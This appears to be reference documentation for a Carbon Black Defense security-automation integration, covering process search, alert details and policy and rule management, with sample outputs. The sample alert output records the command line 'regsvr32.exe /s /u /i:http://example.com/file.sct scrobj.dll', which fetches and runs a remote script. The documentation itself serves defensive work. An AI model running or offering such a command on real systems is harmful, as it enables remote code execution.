CarbonBlackDefense.GetProcesses.Sha256Hash	SHA-256 hash
CarbonBlackDefense.GetProcesses.TotalResults	Total results

Command Example

!cbd-find-processes ipAddress="67.143.208.113" rows=2

Context Example

CarbonBlackDefense:{} 1 item
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2

Human Readable Output

ApplicationName	ApplicationPath	NumEvents	PrivatePid	ProcessId	Sha256Hash
Google Chrome	/Applications/Google Chrome.app/Contents/MacOS/Google Chrome	3580	81577-1533502547808-202	81577	19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
cloud-drive-ui	/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui	2038	1071-1533502548722-245	1071	f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b

Get alert details

Returns the details of a specified alert.

Base Command

cbd-get-alert-details

Input

Parameter	Description
alertId	Alert ID

Context Output

Path	Description
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType	Device type
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group	Group
CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId	Group ID
CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime	Registered time
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId	Device ID
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName	Device name
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status	Status
CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion	OS version
CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion	Sensor version
CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName	User name
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance	Importance
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message	Message
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success	Success
CarbonBlackDefense.GetAlertDetails.Events.ParentHash	Parent hash
CarbonBlackDefense.GetAlertDetails.Events.PolicyState	Policy state
CarbonBlackDefense.GetAlertDetails.Events.LongDescription	Long description
CarbonBlackDefense.GetAlertDetails.Events.ParentPid	Parent PID
CarbonBlackDefense.GetAlertDetails.Events.ProcessId	Process ID
CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators	Threat indicators
CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath	Application path
CarbonBlackDefense.GetAlertDetails.Events.ProcessHash	Process hash
CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash	Process MD5 hash
CarbonBlackDefense.GetAlertDetails.Events.EventId	Event ID
CarbonBlackDefense.GetAlertDetails.Events.EventTime	Event time
CarbonBlackDefense.GetAlertDetails.Events.EventType	Event type
CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus	Kill chain status
CarbonBlackDefense.GetAlertDetails.Events.ParentName	Parent name
CarbonBlackDefense.GetAlertDetails.Events.ParentPPid	ParentP PID
CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid	ProcessP PID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId	Incident ID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName	Application name
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName	Indicator name
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash	SHA-256 hash
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary	Summary
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId	Threat ID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore	Threat score
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time	Time

Command Example

!cbd-get-alert-details alertId=HWOXYQ6P

Context Example

Account:{} 2 items
CarbonBlackDefense:{} 2 items
GetAlertDetails:{} 1 item
DeviceInfo:{} 4 items
DeviceInfo:{} 13 items
DeviceName:ECIADWS7
Success:true
Message:success
RegisteredTime:1525879595477
DeviceType:WINDOWS
DeviceId:896327
Status:REGISTERED
OsVersion:Windows 7 x86 SP: 1
Importance:MEDIUM
UserName:EVILCORP\Expel
GroupId:0
SensorVersion:3.1.0.100
Group:null
Events:{} 17 items
OrgId:1105
ThreatInfo:{} 6 items
IncidentId:HWOXYQ6P
Indicators:{} 3 items
ApplicationName:[] 64 items
IndicatorName:[] 64 items
Sha256Hash:[] 64 items
Summary:The application regsvr32.exe is executing an encoded fileless script.
ThreatId:218c1859d76eb42113590f9da21e2cec
ThreatScore:5
Time:1533253999790
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Endpoint:{} 2 items
Hostname:ECIADWS7
OS:WINDOWS
Process:{} 7 items
CommandLine:regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
Endpoint:ECIADWS7
MD5:432be6cf7311062633459eef6b242fb5
PID:12804
ParentID:10808
ParentName:alert_generator.bat
Path:C:\Windows\System32\regsvr32.exe

Get all policy details.

Returns the details of all policies. the details

Base Command

cbd-get-policies

Input

There is no input for this command.

Context Output

Path	Description
CarbonBlackDefense.GetPolicies.Id	The policy ID
CarbonBlackDefense.GetPolicies.PriorityLevel	The policy's priority level
CarbonBlackDefense.GetPolicies.SystemPolicy	System policy ( boolean )
CarbonBlackDefense.GetPolicies.LatestRevision	The policy's latest revision
CarbonBlackDefense.GetPolicies.Policy	The policy object

Command Example

!cbd-get-policies

Context Example

CarbonBlackDefense:{} 1 item
GetPolicies:[] 40 items
0:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true

Get the details of a specified policy

Returns the details of a specified policy.

Base Command

cbd-get-policy

Input

Parameter	Description
policyId	Policy ID

Context Output

Path	Description
CarbonBlackDefense.GetPolicy.Id	The policy ID
CarbonBlackDefense.GetPolicy.PriorityLevel	The policy's priority level
CarbonBlackDefense.GetPolicy.SystemPolicy	System policy ( boolean )
CarbonBlackDefense.GetPolicy.LatestRevision	The policy's latest revision
CarbonBlackDefense.GetPolicy.Policy	The policy object

Command Example

!cbd-get-policy policyId=6525

Context Example

CarbonBlackDefense:{} 1 item
GetPolicy:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true

Human Readable Output

Id	6525
LatestRevision	1488926710902
Policy	{"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]}
PriorityLevel	MEDIUM
SystemPolicy	true

Create a policy

Creates a policy, as prescribed by further input.

Base Command

cbd-create-policy

Input

Parameter	Description
description	Policy description
name	A single line name for the policy
priorityLevel	Priority score associated with sensors assigned to this policy
policy	JSON object containing the policy details. Make sure a valid policy object is passed: Use the `get-policy` command to retrieve a similar policy object. Use the `set-policy` command to re-set some of the policy's fields. Use the modified object.

Context Output

Path	Description
CarbonBlackDefense.CreatePolicy.PolicyId	The new policy ID

Command Example

!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={ "policyInfo": { "description": "test policy for documentation", "name": "documentation test", "policy": { "avSettings": { "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 }, "features": [ { "enabled": false, "name": "SIGNATURE_UPDATE" }, { "enabled": true, "name": "ONACCESS_SCAN" }, { "enabled": true, "name": "ONDEMAND_SCAN" } ], "onAccessScan": { "profile": "NORMAL" }, "onDemandScan": { "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN", "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 } }, "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } }, "updateServers": { "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ], "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ] } }, "directoryActionRules": [ { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" } ], "id": -1, "rules": [ { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false }, { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false }, { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false }, { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false }, { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false } ], "sensorSettings": [ { "name": "SHOW_UI", "value": "true" }, { "name": "BACKGROUND_SCAN", "value": "true" }, { "name": "POLICY_ACTION_OVERRIDE", "value": "true" }, { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." }, { "name": "LOGGING_LEVEL", "value": "false" }, { "name": "ALLOW_UNINSTALL", "value": "true" }, { "name": "QUARANTINE_DEVICE", "value": "false" }, { "name": "RATE_LIMIT", "value": "0" }, { "name": "CONNECTION_LIMIT", "value": "0" }, { "name": "QUEUE_SIZE", "value": "100" }, { "name": "LEARNING_MODE", "value": "0" }, { "name": "SCAN_NETWORK_DRIVE", "value": "true" }, { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" }, { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" }, { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" }, { "name": "DELAY_EXECUTE", "value": "true" }, { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" }, { "name": "HASH_MD5", "value": "false" }, { "name": "SCAN_LARGE_FILE_READ", "value": "false" }, { "name": "SHOW_FULL_UI", "value": "true" }, { "name": "HELP_MESSAGE", "value": "CarbonBlack" }, { "name": "SECURITY_CENTER_OPT", "value": "true" }, { "name": "CB_LIVE_RESPONSE", "value": "true" }, { "name": "UNINSTALL_CODE", "value": "false" } ] }, "priorityLevel": "LOW", "version": 2 } }

Context Example

CarbonBlackDefense:{} 1 item
CreatePolicy:{} 1 item
PolicyId:21356

Human Readable Output

PolicyId	21356

Update a policy

Updates an existing policy.

Base Command

cbd-update-policy

Input

Parameter	Description
description	Policy description
name	A single line name for the policy
priorityLevel	Priority score associated with sensors assigned to this policy.
id	The ID of the policy to update.
policy	JSON object containing the policy details. Make sure a valid policy object is passed: Use the `get-policy` command to retrieve a similar policy object. Use the `set-policy` command to re-set some of the policy's fields. Use the modified object.

Context Output

There is no context output for this command.

Command Example

!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[],"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"value":"","name":"HELP_MESSAGE"},{"value":"false","name":"PRESERVE_SYSTEM_MEMORY_SCAN"},{"value":"false","name":"HASH_MD5"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHOW_FULL_UI","value":"false"},{"name":"SECURITY_CENTER_OPT","value":"false"},{"name":"CB_LIVE_RESPONSE","value":"false"},{"name":"UNINSTALL_CODE","value":"false"}],"avSettings":{"signatureUpdate":{"schedule":{"initialRandomDelayHours":4,"fullIntervalHours":0,"intervalHours":4}},"features":[{"enabled":false,"name":"SIGNATURE_UPDATE"},{"enabled":false,"name":"ONACCESS_SCAN"},{"name":"ONDEMAND_SCAN","enabled":true}],"updateServers":{"servers":[{"flags":0,"regId":null,"server":["http://updates.cdc.carbonblack.io/update"]}],"serversForOffSiteDevices":["http://updates.cdc.carbonblack.io/update"]},"apc":{"maxExeDelay":45,"riskLevel":4,"enabled":false,"maxFileSize":4},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"startHour":0,"recoveryScanIfMissed":true,"days":null,"rangeHours":0}}}}

Human Readable Output

Request Success

Delete a policy

Deletes a specified policy.

Base Command

cbd-delete-policy

Input

Parameter	Description
policyId	Policy ID

Context Output

There is no context output for this command.

Human Readable Output

Request Success

Add a rule to a policy

Adds a specified rule to a specified policy.

Base Command

cbd-add-rule-to-policy

Input

Parameter	Description
action	Rule action
operation	Rule operation
required	Rule required
id	Rule ID
type	Application type
value	Application value
policyId	Policy ID

Context Output

There is no context output for this command.

Command Example

!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"

Human Readable Output

Request Success

Delete a rule from a policy

Deletes a specified rule from a specified policy.

Base Command

cbd-delete-rule-from-policy

Input

Parameter	Description
policyId	ID of the policy to delete the rule from
ruleId	ID of the rule to delete

Context Output

There is no context output for this command.

Command Example

!cbd-delete-rule-from-policy ruleId=2 policyId=21355

Human Readable Output

Request Success

Update a rule in a policy

Updates a rule in a specified policy.

Base Command

cbd-update-rule-in-policy

Input

Parameter	Description
action	Rule action
operation	Rule operation
required	Rule required
id	Rule ID
type	Application type
value	Application value
policyId	Policy ID

Context Output

There is no context output for this command.

Command Example

!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST

Human Readable Output

Request Success

Set a policy

Sets a specified policy.

Base Command

cbd-set-policy

Input

Parameter	Description
keyValue	A JSON object that holds key-value pairs. Key is the field path in the policy object to update with value.
policy	The policy to set.

Context Output

There is no context output for this command.